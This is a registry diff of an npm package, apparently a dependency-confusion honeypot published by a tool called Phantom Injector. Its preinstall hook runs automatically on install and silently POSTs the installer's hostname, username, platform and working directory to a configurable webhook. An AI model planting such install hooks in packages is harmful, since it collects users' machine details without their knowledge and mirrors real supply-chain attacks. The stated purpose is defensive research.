@hackathon-26/auth-service 0.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -0
- package/package.json +9 -0
- package/preinstall.js +57 -0
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
// Phantom Injector — security placeholder. Do not use.
|
package/package.json
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@hackathon-26/auth-service",
|
|
3
|
+
"version": "0.0.1",
|
|
4
|
+
"description": "Security placeholder published by Phantom Injector. This package exists to prevent dependency confusion attacks.",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "node preinstall.js"
|
|
7
|
+
},
|
|
8
|
+
"license": "MIT"
|
|
9
|
+
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* templates/npm-preinstall.js
|
|
3
|
+
* --------------------------------------------------------------------------
|
|
4
|
+
* This script is injected into honeypot npm packages as a "preinstall" hook.
|
|
5
|
+
* When someone runs `npm install <package>`, this fires BEFORE any code is
|
|
6
|
+
* downloaded and sends a ping to the configured webhook URL.
|
|
7
|
+
*
|
|
8
|
+
* IMPORTANT: This file is a TEMPLATE. The placeholder http://localhost:3000/alerts is
|
|
9
|
+
* replaced at generation time by squatter/generator.js.
|
|
10
|
+
* --------------------------------------------------------------------------
|
|
11
|
+
*/
|
|
12
|
+
|
|
13
|
+
'use strict';
|
|
14
|
+
|
|
15
|
+
const http = require('http');
|
|
16
|
+
const https = require('https');
|
|
17
|
+
const os = require('os');
|
|
18
|
+
|
|
19
|
+
const WEBHOOK_URL = 'http://localhost:3000/alerts';
|
|
20
|
+
const PKG_NAME = '@hackathon-26/auth-service';
|
|
21
|
+
|
|
22
|
+
(function ping() {
|
|
23
|
+
const payload = JSON.stringify({
|
|
24
|
+
event: 'dependency-confusion-alert',
|
|
25
|
+
package: PKG_NAME,
|
|
26
|
+
ecosystem: 'npm',
|
|
27
|
+
hostname: os.hostname(),
|
|
28
|
+
platform: os.platform(),
|
|
29
|
+
arch: os.arch(),
|
|
30
|
+
user: os.userInfo().username,
|
|
31
|
+
cwd: process.cwd(),
|
|
32
|
+
timestamp: new Date().toISOString(),
|
|
33
|
+
});
|
|
34
|
+
|
|
35
|
+
const url = new URL(WEBHOOK_URL);
|
|
36
|
+
const mod = url.protocol === 'https:' ? https : http;
|
|
37
|
+
|
|
38
|
+
const req = mod.request(
|
|
39
|
+
{
|
|
40
|
+
hostname: url.hostname,
|
|
41
|
+
port: url.port || (url.protocol === 'https:' ? 443 : 80),
|
|
42
|
+
path: url.pathname,
|
|
43
|
+
method: 'POST',
|
|
44
|
+
headers: {
|
|
45
|
+
'Content-Type': 'application/json',
|
|
46
|
+
'Content-Length': Buffer.byteLength(payload),
|
|
47
|
+
'User-Agent': 'phantom-injector-honeypot/0.0.1',
|
|
48
|
+
},
|
|
49
|
+
timeout: 5000,
|
|
50
|
+
},
|
|
51
|
+
(res) => res.resume(),
|
|
52
|
+
);
|
|
53
|
+
|
|
54
|
+
req.on('error', () => {}); // Silently fail — don't break install
|
|
55
|
+
req.write(payload);
|
|
56
|
+
req.end();
|
|
57
|
+
})();
|